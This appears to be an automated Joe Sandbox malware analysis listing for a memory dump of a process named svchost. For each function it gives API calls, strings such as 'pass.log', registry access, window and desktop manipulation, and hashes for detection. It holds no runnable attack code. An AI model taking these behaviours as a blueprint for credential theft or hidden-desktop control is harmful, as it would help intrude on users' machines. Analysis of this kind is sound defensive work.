Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
String ID:
API String ID: 3901171168-0
Opcode ID: 0c7afd6da335b517d3872eb10a2b4f02e35741645c6aed1195dc2ffaf349796d
Instruction ID: 98f28b0c2639fd486dda3418c353ab5e144aa453b81c8c4d056c1a4ac4ebd0dc
Opcode Fuzzy Hash: 0c7afd6da335b517d3872eb10a2b4f02e35741645c6aed1195dc2ffaf349796d
Instruction Fuzzy Hash: AD012476E41A11ABE7205FA4F84CB1AB754EFC8B627244815F24A93304C7308C54CBF0

Function 00401920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040194A
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

Strings

ntdll.dll, xrefs: 00401952
RtlUniform, xrefs: 0040195D

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC

Function 02D23A00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02D23BCE), ref: 02D23A34
RegQueryValueExA.ADVAPI32(00000000,a1633ef1a,00000000,?,00000000,?), ref: 02D23A55
RegCloseKey.ADVAPI32(00000000), ref: 02D23A63

Strings

a1633ef1a, xrefs: 02D23A4F
software\microsoft, xrefs: 02D23A1C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: a1633ef1a$software\microsoft
API String ID: 3677997916-2677533378
Opcode ID: e1d2c86795296f11ed062347a33f46cabdefdd40ef4d0bbfd66614ccaba6de2e
Instruction ID: 77d61d63fdc167843570461a8e46d6381482abdb878bd61ddef91ba30d8622ab
Opcode Fuzzy Hash: e1d2c86795296f11ed062347a33f46cabdefdd40ef4d0bbfd66614ccaba6de2e
Instruction Fuzzy Hash: 94F03174E40308FBEB00CFA4DC49FAE77B8EB08705F504598E905A6380D7759A54CB90

Function 02D4C010 Relevance: 7.7, APIs: 5, Instructions: 239COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D4C069

Part of subcall function 02D50A00: __WSAFDIsSet.WS2_32(?,?), ref: 02D50AB0
Part of subcall function 02D50A00: closesocket.WS2_32(?), ref: 02D50ACD

realloc.MSVCRT ref: 02D4C075
malloc.MSVCRT ref: 02D4C0AD
realloc.MSVCRT ref: 02D4C0B9
malloc.MSVCRT ref: 02D4C10C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$realloc$closesocket
String ID:
API String ID: 3133911991-0
Opcode ID: 221da08993a6ae6613cb9bc1d6d4d601d2ff02ebf283f7377a9c592d37c26dd3
Instruction ID: ef6d8ec93fdfe92142376bedc1b36a0112864dbfd791de7f9b185b83dee71803
Opcode Fuzzy Hash: 221da08993a6ae6613cb9bc1d6d4d601d2ff02ebf283f7377a9c592d37c26dd3
Instruction Fuzzy Hash: A491D971A116558FCF04CF24ED94AEA37A2EF88305F0885B9ED0D9B346E774AD15CBA0

Function 02D340B0 Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D340B9
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D340EC
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D34118
VirtualQuery.KERNEL32(02D450A0,?,0000001C), ref: 02D3413F
SetLastError.KERNEL32(?), ref: 02D341BC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 5f1a5a6b03424fff6564bfa2aa58ed75b1bc322d406848a38a75f13c977fc239
Instruction ID: 43c04a80b69581973ebf764416fff438829a352de6fb5e5fedc41577c5f31ec9
Opcode Fuzzy Hash: 5f1a5a6b03424fff6564bfa2aa58ed75b1bc322d406848a38a75f13c977fc239
Instruction Fuzzy Hash: 09410C70D00618AFDB51DFA8D884AAEBBF5EF58300F50852AE815E7300D778AD41CFA1

Function 02D33E50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D33E59
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33E8C
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33EB8
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D33EDF
SetLastError.KERNEL32(?), ref: 02D33F5C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 54060bcedd09d4d737149c8a3db663bc50a5a21ff8032b57286cca975a7b2da7
Instruction ID: 654f4259af74c3908dfed8a6fe66a1a4c08004cfc321f3192be3852f4c6ee270
Opcode Fuzzy Hash: 54060bcedd09d4d737149c8a3db663bc50a5a21ff8032b57286cca975a7b2da7
Instruction Fuzzy Hash: 4A410A70E00218AFDB51DFA8D984AAEBBF5EB48300F90856AE459E7340D774AD41CFE0

Function 02D213B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D213DE
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2141A
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D21446
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2146D
SetLastError.KERNEL32(?), ref: 02D21498

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: f858cc85cc553e1d06393e408d9ce4acafcc2d00c73bbe114e1c6f1d407518a0
Instruction ID: 0533434fbfbc878083e4a1c61a466f23bc2a35d5ac9d033b151ef1f18286c002
Opcode Fuzzy Hash: f858cc85cc553e1d06393e408d9ce4acafcc2d00c73bbe114e1c6f1d407518a0
Instruction Fuzzy Hash: 4531CAB1D00209AFDB40CFA8D885AEEBBF5FB5C314F50852AE918E3301E77499458FA0

Function 02D38FE0 Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D38FE9
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3901C
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39048
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3906F
SetLastError.KERNEL32(?), ref: 02D3909E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 88d63e8a240668f737d7522926218a865d03b09a9a1f0c28c72eb559d58a0230
Instruction ID: 0909b291a9c9fe925c6b29df84dc6db6989650f087cf13a18d2a6db11fd4716c
Opcode Fuzzy Hash: 88d63e8a240668f737d7522926218a865d03b09a9a1f0c28c72eb559d58a0230
Instruction Fuzzy Hash: 4C31B8B5D00219AFDB40CFA8D895AEEBBB5FB58310F50856AE914E7300E775AD41CFA0

Function 02D391E0 Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 02D39202
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39233
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D3925F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D39286
WSASetLastError.WS2_32(?), ref: 02D392B9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 9b3dcf8fef1a247ef215c3680d9149078a52ab4cde61d4582cfa3f62e069471e
Instruction ID: 61199b565d83731ee19e5de5a6c0ea709b5da412b32d98cc91abac91ff458c6f
Opcode Fuzzy Hash: 9b3dcf8fef1a247ef215c3680d9149078a52ab4cde61d4582cfa3f62e069471e
Instruction Fuzzy Hash: 5D3188B5D40209AFDB40DFA9D895AEEBBF5FB48300F50856AE919E7300E7749941CFA0

Function 02D488B0 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02D48D84), ref: 02D488E3
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02D48D84), ref: 02D4890B
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02D48D84), ref: 02D48935
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02D48D84), ref: 02D48943
FileTimeToDosDateTime.KERNEL32(?,02D48D84,?), ref: 02D48955

Part of subcall function 02D483F0: GetFileType.KERNEL32(?,00000000,00000000), ref: 02D483F9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FileTime$Type$DateLocalPointerSystem
String ID:
API String ID: 60630809-0
Opcode ID: 9db7de7f73c2bef89c8cc66c4c87c3e55e34a5640f76d31f5a5876e6a1b397bc
Instruction ID: 69b2a99b545770c5b79b5982573afcf62b279f5818589ddd17b906cc10a6dd72
Opcode Fuzzy Hash: 9db7de7f73c2bef89c8cc66c4c87c3e55e34a5640f76d31f5a5876e6a1b397bc
Instruction Fuzzy Hash: F82165B29007449FC730CF69D9C49ABF7F8FB48314B500A2EE59AC2A40D775E544CB61

Function 02D44E00 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,02D332AB,00000000,00010108,?,00000000), ref: 02D44E3F
RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02D44E74
RegCloseKey.ADVAPI32(?), ref: 02D44E9E
RegDeleteKeyA.ADVAPI32(00000104,02D332AB), ref: 02D44EB6
RegCloseKey.ADVAPI32(?), ref: 02D44EC2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 3c7c8b0abc79b6d9c4fa3eb6daf30cf73ba9dd57f9d54f59aeaf662b09a0d62a
Instruction ID: 85515265f49288a7c2cda5290bad73183a4bf27d4301aeb6b7c41f00ffe91aa0
Opcode Fuzzy Hash: 3c7c8b0abc79b6d9c4fa3eb6daf30cf73ba9dd57f9d54f59aeaf662b09a0d62a
Instruction Fuzzy Hash: 0B214476A40229ABDB20DA98EC44FEAB76CEB44711F144565FD44EB340DAB0DE94CBE0

Function 02D219E0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D21A1F
free.MSVCRT(02D265E8), ref: 02D21A48
exit.MSVCRT ref: 02D21A53
memcpy.MSVCRT ref: 02D21A63
free.MSVCRT(02D265E8), ref: 02D21A83

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: free$exitmallocmemcpy
String ID:
API String ID: 2377537114-0
Opcode ID: 6c0013ccb449ce5a3b0777744c21adc175e945885c98debbd78bc3cd58801d71
Instruction ID: 911abf69cbd50dd69351e1cf336c8adce7ca7280d439c7c99d9e0e250fdda080
Opcode Fuzzy Hash: 6c0013ccb449ce5a3b0777744c21adc175e945885c98debbd78bc3cd58801d71
Instruction Fuzzy Hash: 64214FB0A04205AFC714CF59E484B6ABBF5FB69308F50C52DD98AC7311D731EA65CBA1

Function 02D256F0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D25712
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25745
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25771
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25798
SetLastError.KERNEL32(?), ref: 02D257B4

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast
String ID:
API String ID: 2886163261-0
Opcode ID: 3bdf04e0fc1a37471a1a582fb1dd2ef2ec6d784696ac2a4afa3313b9c2680627
Instruction ID: 15ffb24a574b4f000f59072d48a0ef1e114fd0a550c497afd06d6df24d6b41c8
Opcode Fuzzy Hash: 3bdf04e0fc1a37471a1a582fb1dd2ef2ec6d784696ac2a4afa3313b9c2680627
Instruction Fuzzy Hash: F43188B5D4120DAFDB40CFA8E985AEEBBF5FB48310F50856AE914E7300E77499548FA0

Function 02D26999 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D269FA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D26A01
memset.MSVCRT ref: 02D26A15
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D26A2E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D26A3C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseProcesslstrcpynmemset
String ID:
API String ID: 3057210225-0
Opcode ID: a8f8adb959ef26c3d9a8d93c3e174207ef1e64cdf59e2dbda853e94d4293d7e1
Instruction ID: de9ac8587a1a020c07c8f5ef00e2d657b5b2b3d256844658430ca925966b3b2e
Opcode Fuzzy Hash: a8f8adb959ef26c3d9a8d93c3e174207ef1e64cdf59e2dbda853e94d4293d7e1
Instruction Fuzzy Hash: 15110871E4536817E72AD774984D7D93798EB2CB08F4008A9EA45E6381D7B0CED8CAE1

Function 02D2D060 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02D2D072
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D2D089
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2D09F
CloseHandle.KERNEL32(00000000), ref: 02D2D0B0
ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02D2D0C7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
String ID:
API String ID: 1270303404-0
Opcode ID: 9a5182655af67f4b3b394a6016a977ce0241154e33dabb93fdb00ecea6001b88
Instruction ID: 43f2f9459c098921a7f8cbe7bef02fb68363837985f6d42cebfd0eee410c0666
Opcode Fuzzy Hash: 9a5182655af67f4b3b394a6016a977ce0241154e33dabb93fdb00ecea6001b88
Instruction Fuzzy Hash: D0018171945218BBE720DB90AD0DFEE7BA8AB05B05F900184FA41AA2C0D7F45E94CBF1

Function 02D3A1B0 Relevance: 7.5, APIs: 5, Instructions: 41memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D3A193,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1BC
GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1C6
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1CD
memset.MSVCRT ref: 02D3A1DE
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A22A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
String ID:
API String ID: 819421891-0
Opcode ID: 0bf58b00aae1dd0820cb4a98b357f86347ff057e43127333b18558018a4c93cc
Instruction ID: 253199782876a55fab87651db0dda8151bd6672a6ae337aece4f1305a1d7ac66
Opcode Fuzzy Hash: 0bf58b00aae1dd0820cb4a98b357f86347ff057e43127333b18558018a4c93cc
Instruction Fuzzy Hash: 320117B1A41B11AFC364CF28F588A06BBF5FF48700B108A19E98A87B40C770F950CFA4

Function 02D2E0E0 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,?,00000000,74DF3080,?,02D28F3C,?,00000006,00000000), ref: 02D2E0EC
GetWindow.USER32(00000000,00000005), ref: 02D2E103
GetWindow.USER32(00000000), ref: 02D2E106
SendMessageA.USER32(00000000,00000006,?,02D28F3C), ref: 02D2E11D
GetWindow.USER32(00000000,00000003), ref: 02D2E122

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$DesktopMessageSendThread
String ID:
API String ID: 3855296974-0
Opcode ID: 6054f785341567aa896ac4cc7cde097f0bfb1cddc4686e7f29db95b714cfd391
Instruction ID: ebfbc962e12cc7458ac6a46cb386cb54d013e4d0b4295e742d2ffd91baaf5702
Opcode Fuzzy Hash: 6054f785341567aa896ac4cc7cde097f0bfb1cddc4686e7f29db95b714cfd391
Instruction Fuzzy Hash: 92F08276A403187FD721EB65EC88EABB36CDBD8B60F014915F90097340D6B0ED508BB0

Function 02D2D0E0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2D0EC
GetCurrentThreadId.KERNEL32 ref: 02D2D0F4
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D2D100
SendMessageA.USER32(?,0000000D,?,?), ref: 02D2D111
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D2D11D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
String ID:
API String ID: 2643679612-0
Opcode ID: 466fec6727761a611a8520f8b4c1a500adfccfc7da3ba83e71ed53f2def96fa0
Instruction ID: e00320f92f44b7b6e0db406e2edf77d0b2e7c0392527dc4451b2defd2a3ad772
Opcode Fuzzy Hash: 466fec6727761a611a8520f8b4c1a500adfccfc7da3ba83e71ed53f2def96fa0
Instruction Fuzzy Hash: 1BF03032680304BBE7105BA5FC8DFABBB6CEB89B61F404816FA05D7381C6B5AC508670

Function 02D2E0A0 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2E0AA
GetCurrentThreadId.KERNEL32 ref: 02D2E0B2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02D29CD4,?,?,?,?,02D291A0,?,?), ref: 02D2E0C4
GetFocus.USER32 ref: 02D2E0C6
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02D29CD4,?,?,?,?,02D291A0,?,?), ref: 02D2E0D3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentFocusProcessWindow
String ID:
API String ID: 968181190-0
Opcode ID: 79d7e886d83226cefb713b6d5a7bbabb1f56940f457b476528aa9bc83108b1bf
Instruction ID: 101c37ab7e979acbd755c52800db7b2a9476f2e62ee7f3eb438fd9cb80d5a60f
Opcode Fuzzy Hash: 79d7e886d83226cefb713b6d5a7bbabb1f56940f457b476528aa9bc83108b1bf
Instruction Fuzzy Hash: EDE09231A40204BBD61057A6BC4DF9FBBACDB867A2F500595FA08D3340D675AC1086B0

Function 02D3F2B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F2D7
PathFileExistsA.SHLWAPI(?), ref: 02D3F340

Strings

5e8dc163, xrefs: 02D3F2D2, 02D3F2DD
pass.log, xrefs: 02D3F31F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashExistsFile
String ID: 5e8dc163$pass.log
API String ID: 1760361154-4085347864
Opcode ID: b1b93404e076a38c7c03561b64858aa48eabd7685b5a75d5ac6ab89f58c4bab0
Instruction ID: 6fe9cc671693419547d7cd67e5f42c19e6fce5a5bd588d6510c85e5c1e1cab82
Opcode Fuzzy Hash: b1b93404e076a38c7c03561b64858aa48eabd7685b5a75d5ac6ab89f58c4bab0
Instruction Fuzzy Hash: 4311D639904659CFC7168B2CA5786E77FE5AB86300B28C6D5E8C6C7311EA709C48C7D0

Function 02D2C220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46

GetWindowInfo.USER32(?,?), ref: 02D2C254
SetWindowLongA.USER32(?,000000EC,?), ref: 02D2C276
SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 02D2C289

Strings

<, xrefs: 02D2C24D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

